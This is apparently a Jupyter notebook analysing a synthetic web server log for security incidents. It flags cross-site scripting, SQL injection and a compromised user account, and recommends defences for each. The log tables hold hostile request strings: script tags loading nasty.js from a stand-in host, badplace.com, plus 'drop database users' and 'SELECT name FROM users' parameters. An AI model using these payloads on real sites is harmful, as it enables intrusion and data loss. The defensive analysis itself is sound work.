In [93]:
import re
import pandas as pd
import urllib.parse
pd.set_option('display.max_colwidth', None)
pd.options.display.max_rows = 100

def url_decode(string):
    return urllib.parse.unquote(string)

data = pd.read_csv(
    'web_logs_2023-01-26.log',
    sep=r'\s(?=(?:[^"]*"[^"]*")*[^"]*$)(?![^\[]*\])',
    engine='python',
    na_values='-',
    header=None,
    names=['ip', 'identity', 'userid', 'unknown', 'time', 'request', 'response', 'size', 'referer', 'user_agent', 'unknown2'],
    converters={'request': url_decode}
)

## 1. Cross-Site Scripting

We see a number of what appear to be Cross-Site Scripting (XSS) attempts.

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

The root cause of XSS vulnerability stems from the failure to properly validate or escape user input or dynamic content, allowing client-side JavaScript to be injected in a manner that will enable it to execute. Therefore, your application is at risk of XSS vulnerability wherever it handles user input. XSS comes in many different forms, which can be categorized into the following groups:

* Reflected (non-persistent) XSS: Just as the name implies, reflected XSS occurs when the injected malicious script results show up or are immediately reflected by the user without adequately sanitizing the content.

* Stored (persistent) XSS: This is a more devastating variant of a cross-site scripting flaw. It occurs when the data provided by the attacker is saved by the server and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.

* DOM-based XSS: DOM-based XSS occurs when the injected malicious code does not get to the webserver. Instead,  it is reflected by client-side JavaScript code on the client-side.

### Recommendation

Preventing cross-site scripting is trivial in some cases but can be much harder depending on the complexity of the application and the ways it handles user-controllable data.

In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:

* Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.

* Encode data on output. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.

* Use appropriate response headers. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.

* Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.

### References

https://www.comparitech.com/net-admin/how-to-find-xss-vulnerability/


In [94]:
data[data.request.str.contains('.js', regex= True, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
65,80.37.69.128,Theresa,"""PUT /cart?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
120,201.138.110.200,Theresa,"""POST /admin/remove_product?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
158,81.91.56.115,Theresa,"""DELETE /admin/remove_user?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
205,1.243.92.78,Theresa,"""DELETE /login?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
336,130.183.166.199,Theresa,"""DELETE /purchase?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
341,63.144.139.231,Theresa,"""PUT /register?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
393,142.217.67.17,Theresa,"""GET /admin?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",303
517,223.195.119.35,,"""GET ?data=<script src=""http://www.badplace.com/nasty.js""></script%3/4037403083972567-254-05/29 HTTP/1.0""",200
552,204.210.110.56,Theresa,"""DELETE /purchase?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
553,199.71.89.79,Theresa,"""POST /admin/add_user?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200


## 2. SQL Injections

We see a number of what appear to be SQL injection attempts.

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

### Recommendation

Most instances of SQL injection can be prevented by using parameterized queries (also known as prepared statements) instead of string concatenation within the query. 

### References

https://portswigger.net/web-security/sql-injection
https://portswigger.net/kb/issues/00400480_sql-statement-in-request-parameter


In [95]:
data[data.request.str.contains('drop', regex= True, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
17,136.201.74.75,Theresa,"""PUT /purchase/completed?id=drop+database+users HTTP/1.0""",200
43,207.77.8.212,Theresa,"""POST /admin?id=drop+database+users HTTP/1.0""",304
137,72.157.181.140,Theresa,"""DELETE /purchase?id=drop+database+users HTTP/1.0""",200
144,201.79.34.146,Theresa,"""GET /admin/remove_user?id=drop+database+users HTTP/1.0""",200
149,137.135.121.45,Theresa,"""GET /register?id=drop+database+users HTTP/1.0""",200
187,123.230.181.187,Theresa,"""POST /register?id=drop+database+users HTTP/1.0""",200
269,42.46.68.21,Theresa,"""GET /cart?id=drop+database+users HTTP/1.0""",200
474,36.105.48.234,Theresa,"""DELETE /login?id=drop+database+users HTTP/1.0""",303
564,13.0.140.201,Theresa,"""DELETE /admin/remove_user?id=drop+database+users HTTP/1.0""",403
617,89.196.253.13,Theresa,"""DELETE /cart?id=drop+database+users HTTP/1.0""",200


In [96]:
data[data.request.str.contains('SELECT', regex= True, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
21,151.203.93.88,Theresa,"""DELETE /register?id=SELECT+name+FROM+users HTTP/1.0""",200
93,167.106.101.104,Theresa,"""POST /purchase?id=SELECT+name+FROM+users HTTP/1.0""",200
110,115.76.49.102,Theresa,"""DELETE /admin/remove_user?id=SELECT+name+FROM+users HTTP/1.0""",200
184,78.245.211.54,Theresa,"""PUT /admin/add_user?id=SELECT+name+FROM+users HTTP/1.0""",200
197,148.75.121.166,Theresa,"""POST /admin/add_product?id=SELECT+name+FROM+users HTTP/1.0""",303
207,115.101.230.8,Theresa,"""PUT /cart?id=SELECT+name+FROM+users HTTP/1.0""",200
216,203.2.14.111,Theresa,"""POST /admin/add_product?id=SELECT+name+FROM+users HTTP/1.0""",200
310,122.171.115.111,Theresa,"""POST /admin/add_product?id=SELECT+name+FROM+users HTTP/1.0""",200
468,198.131.5.220,Theresa,"""GET /register?id=SELECT+name+FROM+users HTTP/1.0""",200
679,97.210.10.127,Theresa,"""POST /register?id=SELECT+name+FROM+users HTTP/1.0""",200


## Compromised Credentials

We can observe that (almost) all of the malicious requests are being made by Theresa. And we can also see that the client ips vary greatly suggesting Theresa's credentials have been compromised and are being actively used to attack the site. 

By looking at requests made against the `/login` endpoint, we can speculate that a brute-force login attack might have been made, as a number of `403`s were observed from multiple client ips - no other login attempts are made in the period in question from other users.

### Recommendation

1. Use stronger passwords
2. Limit number of login attempts
3. Use  CAPTCHAs
4. Enforce two-factor authentication
5. Monitor attempted logins

### References

https://portswigger.net/web-security/access-control  
https://wishdesk.com/blog/guide-to-brute-force-attack

In [97]:
data[data.userid.str.contains('Theresa', regex= True, na=False)][["ip","userid","request","response"]]

Unnamed: 0,ip,userid,request,response
2,62.21.196.194,Theresa,"""POST /admin HTTP/1.0""",200
17,136.201.74.75,Theresa,"""PUT /purchase/completed?id=drop+database+users HTTP/1.0""",200
21,151.203.93.88,Theresa,"""DELETE /register?id=SELECT+name+FROM+users HTTP/1.0""",200
30,207.60.25.21,Theresa,"""PUT /admin/add_user HTTP/1.0""",200
31,32.219.87.143,Theresa,"""DELETE /admin HTTP/1.0""",403
43,207.77.8.212,Theresa,"""POST /admin?id=drop+database+users HTTP/1.0""",304
44,47.51.127.36,Theresa,"""POST /admin/add_product HTTP/1.0""",200
65,80.37.69.128,Theresa,"""PUT /cart?data=<script src=""http://www.badplace.com/nasty.js""></script%3 HTTP/1.0""",200
70,10.147.83.64,Theresa,"""POST /cart HTTP/1.0""",200
93,167.106.101.104,Theresa,"""POST /purchase?id=SELECT+name+FROM+users HTTP/1.0""",200


In [98]:
df1 = data[data.request.str.contains('login', regex= True, na=False)][["ip","time","userid","request","response"]]
df1

Unnamed: 0,ip,time,userid,request,response
4,78.144.28.132,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
13,102.53.65.86,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
19,121.193.109.2,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
25,59.219.254.101,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
34,111.237.69.83,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
39,111.237.69.83,[2023-01-26 15:45:45 +00:00],,"""DELETE /login HTTP/1.0""",200
49,113.127.197.68,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
54,223.195.119.35,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200
57,12.92.165.166,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",200
68,83.1.237.231,[2023-01-26 15:45:45 +00:00],,"""PUT /login HTTP/1.0""",200


In [99]:
df2 = df1[df1['response'] == 403]
df2

Unnamed: 0,ip,time,userid,request,response
127,43.22.168.182,[2023-01-26 15:45:45 +00:00],Theresa,"""DELETE /login HTTP/1.0""",403
472,78.144.28.132,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",403
573,20.93.153.227,[2023-01-26 15:45:45 +00:00],Theresa,"""GET /login HTTP/1.0""",403
666,223.195.119.35,[2023-01-26 15:45:45 +00:00],,"""POST /login HTTP/1.0""",403
839,223.195.119.35,[2023-01-26 15:45:45 +00:00],,"""DELETE /login HTTP/1.0""",403


### HTTP Response Codes for Reference

| Code | Description |
|----------|---------|
| 1xx | Information |
| 2xx | Successful  |
| 3xx | Redirection |
| 4xx | Client Error|
| 5xx | Server Error|